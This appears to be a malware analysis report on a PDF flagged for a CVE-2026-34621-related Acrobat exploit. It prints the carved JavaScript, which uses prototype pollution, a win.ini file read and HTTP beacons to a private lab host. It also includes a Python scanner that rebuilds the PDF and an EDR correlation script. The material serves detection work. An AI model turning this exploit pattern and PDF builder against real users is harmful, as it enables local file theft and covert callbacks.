Malicious PDF — malware analysis report

Static analysis result for SHA-256 2d887cfaeb10c093…

Verdict: MALICIOUS
File type: PDF
Size: 1.4 KB
First seen: 2026-05-09
MD5: d7e0692517a4c34004d0bf485c90fc1e
SHA-1: 78af961986b16a62b17208e8e3a179838f644e19
SHA-256: 2d887cfaeb10c09305d0156dce0ecf18f80170fb901952e345b51f5b3729db36
Risk score: 174

Machine Learning

  • Nyx PDF Classifier malicious score 0.9994

Heuristics (7)

  • Acrobat prototype-pollution PoC/exploit pattern [critical] (likely CVE-2026-34621 related; rule CVE_2026_34621_RELATED)
    PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain. In this sample the pollution is a getter installed on Object.prototype and the file-read primitive is util.readFileIntoStream() against C:\Windows\win.ini (see the extracted script below).
  • JavaScript action [low] (4 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Prototype-pollution JavaScript pattern [high] (CVE related; rule PDF_JS_PROTOTYPE_POLLUTION)
    PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE. Here the mutation is Object.prototype.__defineGetter__('__trusted', ...) in the same script as app.* and util.* calls.
  • Embedded JS stream [low] (rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript issues an HTTP request on open [low] (rule PDF_JS_NETWORK_BEACON)
    Embedded JavaScript calls a network API (this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP), typically an open-time beacon / tracking pixel or a data-exfiltration callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming that the recipient opened the file, or fetching a next stage). Here it is a synchronous XMLHttpRequest GET to http://192.168.1.100/beacon2.
    Matched line in script
    try {
        var x = new XMLHttpRequest();
        x.open("GET", "http://192.168.1.100/beacon2", false);
        x.send();
    } catch(e3) {}
  • PDF JavaScript opens or fetches a remote URL/document [low] (rule PDF_JS_REMOTE_DOC_FETCH)
    Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
    Matched line in script
    try {
        app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
    } catch(e1) {}
  • Embedded URL [info] (rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://192.168.1.100/cve-2026-34621-beacon (referenced by PDF JavaScript)
    • http://192.168.1.100/beacon2 (referenced by PDF JavaScript)
    Both hosts are in the private 192.168.0.0/16 range, so these callbacks only resolve inside the network that produced the sample; treat them as lab indicators, not as external infrastructure to block or pivot on.
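The rules above can be reproduced with a small static scanner. The following is an added example, not the analysis engine's code: it builds a constructed one-page PDF around the script carved from this sample (object 4, shown under Extracted artifacts), extracts every /JS stream by honouring /Length but falling back to the endstream keyword when the two disagree, and applies the report's rule names with assumed keyword sets (which APIs count as privileged, which as the file-read primitive, and which as network or remote-document calls are my assumptions, not the engine's). It also flags extracted URLs whose host is a private address.

```python
# Added example, not the analysis engine's code: rule names are the report's, the
# keywords each rule keys on are assumptions, and the sample PDF is constructed here.
import ipaddress
import re
import zlib
from urllib.parse import urlsplit

# Script reproduced from the extracted artifact (comments and try/catch trimmed).
SAMPLE_JS = r"""Object.prototype.__defineGetter__('__trusted', function() { return true; });
app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
var x = new XMLHttpRequest();
x.open("GET", "http://192.168.1.100/beacon2", false);
x.send();
"""

def build_sample_pdf(js, compress=False, bad_length=False):
    """Constructed one-page PDF whose /OpenAction runs `js` from a /JS stream;
    bad_length=True writes a wrong /Length to exercise the carver's check."""
    data = zlib.compress(js.encode()) if compress else js.encode()
    filt = b" /Filter /FlateDecode" if compress else b""
    length = len(data) + 200 if bad_length else len(data)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [5 0 R] /Count 1 >>",
        b"<< /Type /Action /S /JavaScript /JS 4 0 R >>",
        b"<< /Length %d%s >>\nstream\n%s\nendstream" % (length, filt, data),
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
    ]
    out, offsets = bytearray(b"%PDF-1.4\n"), []
    for i, body in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (i, body)
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % o for o in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref)
    return bytes(out)

# Object header up to the stream keyword; the dictionary may not cross 'endobj'.
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\s*(<<(?:(?!endobj).)*?>>)\s*stream\r?\n", re.S)

def extract_streams(pdf):
    """Yield (object number, decoded bytes) per stream object. The body is sliced by
    /Length and checked against 'endstream'; when they disagree the keyword wins, so a
    wrong /Length can neither truncate the script nor drag the following objects,
    xref table and trailer into the carved artifact."""
    for m in OBJ_RE.finditer(pdf):
        num, dct, start = int(m.group(1)), m.group(2), m.end()
        kw, ln = pdf.find(b"endstream", start), re.search(rb"/Length\s+(\d+)", dct)
        end = start + int(ln.group(1)) if ln else -1
        if end >= 0 and re.match(rb"\r?\n?endstream", pdf[end:end + 11]):
            data = pdf[start:end]
        elif kw >= 0:                               # /Length missing or wrong
            data = re.sub(rb"\r?\n\Z", b"", pdf[start:kw])
        else:
            continue
        if b"/FlateDecode" in dct:
            data = zlib.decompress(data)            # a corrupt stream raises; caller decides
        yield num, data

# Keyword sets are assumptions about what each rule keys on, not the engine's.
PROTO_RE = re.compile(r"\b(?:Object|Array|Function)\.prototype\b|__proto__")
PRIV_API_RE = re.compile(r"\b(?:app|util|Collab|Net|SOAP)\.\w+")
FILE_READ_RE = re.compile(r"util\.readFileIntoStream")  # the primitive this sample uses
NET_RE = re.compile(r"\bXMLHttpRequest\b|this\.getURL\s*\(|\bSOAP\.")
REMOTE_RE = re.compile(r"app\.launchURL\s*\(|app\.openDoc\s*\([^)]*cFS")
URL_RE = re.compile(r"https?://[^\s\"'()<>]+")

def scan_js(js):
    """Apply the per-script rules from the report; returns {rule: matched text}."""
    proto, read, net, rem = (r.search(js) for r in (PROTO_RE, FILE_READ_RE, NET_RE, REMOTE_RE))
    checks = (("PDF_JS_PROTOTYPE_POLLUTION", proto and PRIV_API_RE.search(js) and proto),
              ("CVE_2026_34621_RELATED", proto and read),   # pollution plus a file read
              ("PDF_JS_NETWORK_BEACON", net),
              ("PDF_JS_REMOTE_DOC_FETCH", rem))
    return {rule: m.group(0) for rule, m in checks if m}

def is_private_url(url):
    """True when the URL host is a literal RFC 1918, loopback or link-local address."""
    try:
        return ipaddress.ip_address(urlsplit(url).hostname or "").is_private
    except ValueError:                              # a hostname, not an address literal
        return False

def scan_pdf(pdf):
    """Document-level result: {"rules": {rule: evidence}, "urls": [(url, is_private)]}."""
    rules, urls = {}, {}
    for flag, rule in ((b"/JavaScript", "PDF_JAVASCRIPT"), (b"/JS", "PDF_JS")):
        if flag in pdf:
            rules[rule] = flag.decode() + " present"
    for num, data in extract_streams(pdf):
        js = data.decode("latin-1")
        for rule, evidence in scan_js(js).items():
            rules.setdefault(rule, "obj %d: %s" % (num, evidence))
        for url in URL_RE.findall(js):
            urls.setdefault(url, is_private_url(url))
    if urls:
        rules["EMBEDDED_URL"] = "%d URL(s)" % len(urls)
    return {"rules": rules, "urls": list(urls.items())}
```

Running `scan_pdf(build_sample_pdf(SAMPLE_JS))` reproduces all seven rule hits from this report and returns both URLs flagged as private. The `bad_length` variant is the case the second carved artifact on this page illustrates: with an over-long /Length the naive slice would run into the page object, xref table and trailer, whereas the endstream check returns exactly the script.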

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0004_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 4 at offset 0xC7
Size: 888 bytes
SHA-256: c29b5f405c84012c9060fca049c5f279d22730475e17c21232b93610afbf0f63
Preview script
First 1,000 lines of the extracted script
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
    Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}

// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
    app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}

// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
    util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}

// Test 3: collab/SOAP outbound (alternate network path)
try {
    var x = new XMLHttpRequest();
    x.open("GET", "http://192.168.1.100/beacon2", false);
    x.send();
} catch(e3) {}

app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");
Filename: javascript_obj0004_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 4 at offset 0xE8
Size: 1161 bytes
Note: this second carve of object 4 runs past the stream's endstream keyword, so its preview ends with the trailing page object, xref table and trailer of the PDF rather than with the script.
SHA-256: 597d5f794aecc980716bc1279aad0a6c5e316447095ae18d8f2f0f1600bf50f2
Preview script
First 1,000 lines of the extracted script
// CVE-2026-34621 - Detection telemetry test
// Prototype pollution
try {
    Object.prototype.__defineGetter__('__trusted', function() { return true; });
} catch(e) {}

// Test 1: HTTP beacon via launchURL (may spawn browser - detectable by EDR)
try {
    app.launchURL("http://192.168.1.100/cve-2026-34621-beacon", true);
} catch(e1) {}

// Test 2: Sensitive file read (IOC mentioned in CVE blog - detectable via file access telemetry)
try {
    util.readFileIntoStream({cDIPath: "C:\\Windows\\win.ini", bEncodeBase64: true});
} catch(e2) {}

// Test 3: collab/SOAP outbound (alternate network path)
try {
    var x = new XMLHttpRequest();
    x.open("GET", "http://192.168.1.100/beacon2", false);
    x.send();
} catch(e3) {}

app.alert("Network telemetry test complete. Check CrowdStrike for:\n1. Acrobat network connections\n2. win.ini file access\n3. Browser spawn from Acrobat");

endstream
endobj
5 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000082 00000 n 
0000000139 00000 n 
0000000199 00000 n 
0000001138 00000 n 
trailer
<< /Size 6 /Root 1 0 R >>
startxref
1209
%%EOF
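The carved script's closing alert names what it expects an EDR to record: Acrobat network connections, a read of win.ini, and a browser spawned from Acrobat. The following is an added example, not CrowdStrike's or the analysis engine's code, that correlates those three signals over constructed telemetry (the event tuple layout and the image names are assumptions; map your sensor's own fields onto them) and attributes the browser spawn to the parent Acrobat process so all three land on one key.

```python
# Added example, not CrowdStrike's or the analysis engine's code. The event
# schema and image names below are constructed assumptions for illustration.
import ipaddress
from collections import defaultdict

ACROBAT = {"acrobat.exe", "acrord32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}

# Constructed telemetry: (event type, pid, parent pid, image, detail). 'detail' is
# the destination for network events, the path for file events and the command
# line for process events. Two benign-looking rows are included as noise.
SAMPLE_EVENTS = [
    ("process", 100, 50, "explorer.exe", ""),
    ("process", 200, 100, "AcroRd32.exe", "C:\\Users\\a\\Downloads\\report.pdf"),
    ("file", 200, 100, "AcroRd32.exe", "C:\\Users\\a\\AppData\\Local\\Adobe\\cache.dat"),
    ("file", 200, 100, "AcroRd32.exe", "C:\\Windows\\win.ini"),
    ("network", 200, 100, "AcroRd32.exe", "192.168.1.100:80"),
    ("process", 300, 200, "msedge.exe", "http://192.168.1.100/cve-2026-34621-beacon"),
    ("network", 300, 200, "msedge.exe", "192.168.1.100:80"),
    ("network", 400, 100, "outlook.exe", "10.0.0.5:443"),
]

def scope_of(destination):
    """'private' for an RFC 1918/loopback/link-local literal, 'public' for any
    other literal, 'unresolved' when the destination is a hostname."""
    host = destination.rsplit(":", 1)[0]
    try:
        return "private" if ipaddress.ip_address(host).is_private else "public"
    except ValueError:
        return "unresolved"

def correlate(events):
    """Group the three signals by the Acrobat process that produced them.

    Returns {acrobat pid: sorted signal strings}. The browser-spawn signal is
    attributed to the parent, so all three end up on the same key."""
    image_of = {pid: img.lower() for typ, pid, _, img, _ in events if typ == "process"}
    signals = defaultdict(list)
    for typ, pid, ppid, img, detail in events:
        img = img.lower()
        if typ == "network" and img in ACROBAT:
            signals[pid].append("acrobat_network:%s:%s" % (detail, scope_of(detail)))
        elif typ == "file" and img in ACROBAT and detail.lower().endswith("\\windows\\win.ini"):
            signals[pid].append("acrobat_reads_win_ini")
        elif typ == "process" and img in BROWSERS and image_of.get(ppid) in ACROBAT:
            signals[ppid].append("acrobat_spawned_browser:%s" % img)
    return {pid: sorted(s) for pid, s in signals.items()}

def triage(events):
    """Severity per Acrobat pid. A single signal has benign explanations (a link
    annotation opening the browser, Acrobat's own update traffic); two or more
    distinct kinds on one process do not."""
    out = {}
    for pid, sigs in correlate(events).items():
        kinds = {s.split(":", 1)[0] for s in sigs}
        out[pid] = "high" if len(kinds) >= 2 else "low"
    return out
```

On the constructed events, `correlate` attributes all three signals to pid 200 and `triage` rates it high, while the browser's own connection and the unrelated Outlook traffic contribute nothing. The private/public scope on the network signal carries the same caveat as the URLs above: a 192.168.x.x destination is a lab indicator, not infrastructure to block.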